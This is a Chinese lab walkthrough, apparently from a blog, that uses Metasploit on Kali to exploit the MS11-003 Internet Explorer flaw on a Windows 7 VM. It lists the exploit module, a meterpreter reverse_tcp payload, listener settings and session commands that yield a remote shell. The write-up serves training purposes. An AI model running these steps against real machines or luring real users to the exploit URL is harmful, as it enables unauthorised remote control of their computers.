kail利用msf工具对ms11-003漏洞入侵渗透Win7

2023-10-31 12:38:58

前言:

windows7IE溢出攻击

实验环境:

工具:metasploit

靶机两台:windows 7和kali2020

攻击机IP地址:10.20.29.129

被攻击机IP地址:10.20.29.134

步骤:

1、在kali里面打开metasploit漏洞利用框架

kail利用msf工具对ms11-003漏洞入侵渗透Win7

2、搜索ms11-003漏洞利用模块 

kail利用msf工具对ms11-003漏洞入侵渗透Win7

3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import

kail利用msf工具对ms11-003漏洞入侵渗透Win7

4、设置payload    set payload windows/meterpreter/reverse_tcp

kail利用msf工具对ms11-003漏洞入侵渗透Win7

5、查看options

kail利用msf工具对ms11-003漏洞入侵渗透Win7

6、配置options信息(SRVHOST、LHOST均为Kali IP、URIPATH+任意数)

set srvhost 10.20.29.129
set lhost 10.20.29.129
set uripath 8

kail利用msf工具对ms11-003漏洞入侵渗透Win7

7、开始攻击 run/exploite,会生成一个URL,复制链接使用Windows7 IE浏览器访问

kail利用msf工具对ms11-003漏洞入侵渗透Win7

8、打开windows 7 并进行访问

kail利用msf工具对ms11-003漏洞入侵渗透Win7

9、这时kali虚拟机出现这种情况说明连接成功

kail利用msf工具对ms11-003漏洞入侵渗透Win7

10、查看session会话

kail利用msf工具对ms11-003漏洞入侵渗透Win7

11、sessions -i 1 连接windows7

选择sessions会话的时候可能会连接不成功,那么换一个sessions即可

kail利用msf工具对ms11-003漏洞入侵渗透Win7

12、获取shell,并输入ipconfig

kail利用msf工具对ms11-003漏洞入侵渗透Win7

 

 

 

 

 

上一篇:Python listdir获取某个目录下所有文件名


下一篇:Oracle报错ORA-12516 TNS:listener could not find available handler with matching protocol stack